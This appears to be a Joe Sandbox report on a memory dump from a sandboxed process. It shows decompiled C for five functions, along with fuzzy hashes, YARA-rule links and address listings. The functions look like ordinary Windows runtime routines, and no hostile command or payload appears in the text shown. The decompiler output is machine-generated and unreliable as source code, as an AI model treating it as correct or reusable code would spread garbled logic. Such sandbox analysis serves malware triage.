Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 41543d4aa7db3deec2f10ba5a3e9d147bcebc55dcb085bd3c0fd00520daa51ae
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: A3510030E04249EFDB22CB68D1D07AEFBB1AF05314F1C81E8D4469B281C376A989D791

Uniqueness

Uniqueness Score: -1.00%

Function 0389740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0389740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0381D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0380F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L037E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L037E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0380F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L037E4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0389740d
0x0389740d
0x03897412
0x03897413
0x03897416
0x03897418
0x0389741c
0x0389741f
0x03897422
0x03897422
0x03897428
0x0389742a
0x0389742a
0x03897451
0x03897432
0x0389744f
0x0389744f
0x00000000
0x03897434
0x03897438
0x03897443
0x03897517
0x03897517
0x0389751a
0x03897535
0x03897520
0x03897527
0x0389752c
0x03897531
0x03897533
0x00000000
0x03897533
0x00000000
0x03897531
0x0389754b
0x0389754f
0x0389755c
0x0389755c
0x0389755f
0x03897560
0x03897561
0x03897562
0x03897563
0x03897568
0x0389756a
0x0389756c
0x0389756d
0x0389756d
0x0389756f
0x03897572
0x03897574
0x03897577
0x0389757c
0x0389757f
0x00000000
0x03897551
0x03897551
0x03897551
0x03897553
0x03897553
0x03897449
0x03897449
0x0389744c
0x0389744c
0x00000000
0x0389744c
0x03897443
0x0389750e
0x03897514
0x03897514
0x03897455
0x03897469
0x0389746d
0x00000000
0x03897473
0x03897473
0x03897476
0x03897480
0x03897484
0x0389748e
0x03897493
0x03897493
0x03897496
0x03897499
0x038974a1
0x038974b1
0x038974b5
0x00000000
0x038974bb
0x038974c1
0x038974c1
0x038974c4
0x038974c5
0x038974c6
0x038974c7
0x038974c8
0x038974cd
0x00000000
0x038974d3
0x038974d3
0x038974d6
0x038974d8
0x038974db
0x038974dd
0x038974e0
0x038974e7
0x038974ee
0x038974ee
0x038974f4
0x038974f9
0x00000000
0x038974fb
0x038974fb
0x038974fd
0x03897500
0x03897503
0x03897505
0x03897505
0x038974f9
0x00000000
0x038974cd
0x038974b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 26f4a5116d55258527b8894316783ffd13200310ebe4cdd1861a8d1c24b04fdf
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 30515971600606EFDB55CF94C880A96BBB9FF45304F19C1EAE908DF252E371EA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 037F2990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E037F2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x389ff00);
				E0381D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x37a1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0380E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x37a1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E038451BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x37a166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E037F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E037D6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E037F2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E037F2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E037F2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E037F2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0381D0D1(_t62);
				goto L28;
			}

0x037f2990
0x037f2992
0x037f2997
0x037f29a3
0x037f29a6
0x037f29ab
0x037f29ad
0x037f29b2
0x03835c80
0x037f29b8
0x037f29b8
0x037f29bb
0x037f29c0
0x037f29c5
0x037f29c6
0x037f29c6
0x037f29cb
0x00000000
0x00000000
0x037f29cd
0x037f29d0
0x037f29d9
0x037f29db
0x037f29dd
0x037f2a7f
0x037f2a84
0x037f2a87
0x037f2a89
0x03835ca1
0x03835ca3
0x00000000
0x037f2a8f
0x037f2a8f
0x00000000
0x037f2a8f
0x00000000
0x037f29e3
0x037f29e3
0x037f29e3
0x00000000
0x037f29e3
0x037f29dd
0x00000000
0x037f29db
0x037f29e6
0x037f29e9
0x037f29eb
0x037f29ed
0x037f29f3
0x037f29f5
0x037f29f8
0x037f29fa
0x037f2a97
0x037f2a9a
0x037f2a9d
0x037f2add
0x00000000
0x037f2a9f
0x037f2aa2
0x037f2aa5
0x037f2aa8
0x037f2aab
0x03835cab
0x03835caf
0x03835cc5
0x03835cda
0x03835cdc
0x03835cdf
0x03835ce5
0x00000000
0x03835ceb
0x03835ced
0x03835cee
0x00000000
0x03835cee
0x03835cb1
0x03835cb4
0x03835cb9
0x03835cbb
0x00000000
0x03835cbd
0x03835cbd
0x00000000
0x03835cbd
0x03835cbb
0x037f2ab1
0x037f2ab1
0x037f2ac4
0x037f2ac6
0x037f2ac6
0x00000000
0x037f2ac6
0x037f2aab
0x00000000
0x037f2a00
0x037f2a09
0x037f2a0e
0x037f2a21
0x037f2a24
0x037f2a35
0x037f2a3a
0x037f2a3d
0x037f2a42
0x037f2a59
0x037f2a59
0x037f2a5c
0x037f2a5f
0x037f2a5f
0x037f29fa
0x037f29f3
0x037f2a64
0x037f2a64
0x037f2a6b
0x037f2a6b
0x037f2a6d
0x037f2a72
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e946c6984a60cd8fca703fe3a5e1abce3336c74717102e39e367472650746bfa
Instruction ID: b0898483041b6e1e1092cdf29fbaaf4615a39c50420371cba24e986bcabd2211
Opcode Fuzzy Hash: e946c6984a60cd8fca703fe3a5e1abce3336c74717102e39e367472650746bfa
Instruction Fuzzy Hash: BD517A79900209EFDF25DF95C880ADEBBB5BF48314F088595EE10AB361C7359952DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 037F4BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E037F4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x38bd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E037CCC50(_t86);
					L11:
					return E0380B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x38b8504
				E037E2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0380FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0380B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L037E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E037CCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x38b8504
								E037DFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E037F4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x037f4bad
0x037f4bbf
0x037f4bc2
0x037f4bc6
0x037f4bcd
0x037f4bd9
0x038367fe
0x03836800
0x037f4ccc
0x037f4ccd
0x037f4cb7
0x037f4cc9
0x037f4cc9
0x037f4bdf
0x037f4be5
0x00000000
0x00000000
0x037f4beb
0x037f4bef
0x00000000
0x00000000
0x037f4bf5
0x037f4bf9
0x037f4c06
0x037f4c0b
0x037f4c17
0x037f4c1c
0x037f4c1f
0x037f4c25
0x037f4c33
0x037f4c3d
0x037f4c40
0x037f4c43
0x037f4c47
0x037f4c4d
0x037f4c53
0x037f4c54
0x037f4c55
0x037f4c56
0x037f4c5b
0x037f4c5c
0x037f4c63
0x037f4c6b
0x00000000
0x00000000
0x03836776
0x03836784
0x03836784
0x0383679f
0x038367a7
0x038367af
0x038367ce
0x00000000
0x038367b1
0x038367b7
0x038367b8
0x038367c1
0x038367d3
0x038367d9
0x038367dd
0x037f4c94
0x037f4c94
0x037f4c98
0x037f4c9c
0x037f4ca3
0x038367f4
0x038367f4
0x037f4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x037f4cb5
0x037f4c79
0x037f4c7e
0x037f4c89
0x037f4c8b
0x037f4c8f
0x037f4c8f
0x00000000
0x037f4c89
0x038367c3
0x00000000
0x038367c3
0x038367af
0x037f4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f85a1e5b7ed3a2280e44b647dfa7b73700798031b7b4ff212a23a3f84253f62
Instruction ID: b2a199b0beb60b9c3edf09fd5488789cea35b54041feb8f1d43d5a5a43df477a
Opcode Fuzzy Hash: 3f85a1e5b7ed3a2280e44b647dfa7b73700798031b7b4ff212a23a3f84253f62
Instruction Fuzzy Hash: 3A419635A00218AFCB21DF69C944BEAB7B8BF45710F4501E9E908EB340EB74DE84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 037F4D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E037F4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x38bd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0380FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x38b7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0380B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L037E4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E037CCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0380B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0380F380(_t67 + 0xc, 0x37a5138, 0x10) == 0) {
								 *0x38b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E037F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E037F4E70(0x38b86b0, 0x37f5690, 0, 0) != 0) {
					_t46 = E037CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x037f4d3b
0x037f4d4d
0x037f4d53
0x037f4d58
0x037f4d65
0x037f4d6c
0x037f4d71
0x037f4d77
0x037f4d7f
0x037f4d8c
0x037f4d8e
0x037f4dad
0x037f4db0
0x037f4db7
0x037f4db8
0x037f4db9
0x037f4dba
0x037f4dbb
0x037f4dc1
0x037f4dc8
0x037f4dcc
0x037f4dd5
0x037f4dde
0x037f4ddf
0x037f4de0
0x037f4de1
0x037f4de6
0x037f4de7
0x037f4de9
0x037f4df3
0x00000000
0x00000000
0x03836c7c
0x03836c8a
0x03836c8a
0x03836c9d
0x03836ca7
0x03836cac
0x03836cb2
0x03836cb9
0x00000000
0x03836cbf
0x03836cbf
0x00000000
0x03836cbf
0x03836cb9
0x037f4dfb
0x03836ccf
0x03836cd3
0x037f4e32
0x037f4e39
0x03836ce0
0x03836cf2
0x03836cf2
0x03836ce0
0x037f4e3f
0x037f4e41
0x037f4e51
0x037f4e51
0x037f4e03
0x037f4e03
0x037f4e09
0x037f4e0f
0x037f4e57
0x00000000
0x00000000
0x037f4e1b
0x037f4e30
0x037f4e5b
0x037f4e5b
0x00000000
0x037f4e30
0x037f4e11
0x037f4e11
0x037f4e16
0x00000000
0x037f4e16
0x037f4e01
0x00000000
0x037f4e01
0x037f4da5
0x03836c6b
0x00000000
0x037f4dab
0x037f4dab
0x00000000
0x037f4dab

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dc37cee371952ff511d2d3b503f3c21c9f91506c1c612bc412d367b01273275
Instruction ID: 241d82c208c7951dde9c8514d204b26e09ff0ad644436722da127fe4705e6319
Opcode Fuzzy Hash: 6dc37cee371952ff511d2d3b503f3c21c9f91506c1c612bc412d367b01273275
Instruction Fuzzy Hash: 7D41CD75A40318AFEB21DF29CC80BABB7A9FB45614F0400E9EA459B381E774DD448A92

Uniqueness

Uniqueness Score: -1.00%

Function 037D8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E037D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x38bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0380B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E037DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x37a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E037F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03803C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E037D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x037d8a0a
0x037d8a1c
0x037d8a23
0x037d8a2e
0x037d8a30
0x037d8a36
0x037d8a3c
0x037d8a3e
0x037d8a4a
0x037d8a52
0x037d8a9c
0x037d8aae
0x037d8a58
0x037d8a5e
0x037d8a6a
0x037d8a6f
0x037d8a75
0x037d8a7d
0x037d8a85
0x037d8a86
0x037d8a89
0x037d8a93
0x037d8a99
0x037d8a9b
0x00000000
0x037d8aaf
0x037d8abe
0x037d8ac3
0x037d8acb
0x037d8ad7
0x037d8ae0
0x037d8af1
0x00000000
0x037d8af1
0x037d8acd
0x037d8ad5
0x037d8afb
0x037d8afd
0x037d8aff
0x037d8b07
0x037d8b22
0x037d8b24
0x037d8b2a
0x037d8b2e
0x037d8b3f
0x037d8b78
0x037d8b41
0x037d8b52
0x037d8b54
0x037d8b5c
0x037d8b74
0x037d8b74
0x037d8b5c
0x037d8b3f
0x037d8b5e
0x037d8b61
0x037d8b64
0x037d8b64
0x037d8b6c
0x037d8b6c
0x037d8b11
0x03829cd5
0x03829cd5
0x037d8b17
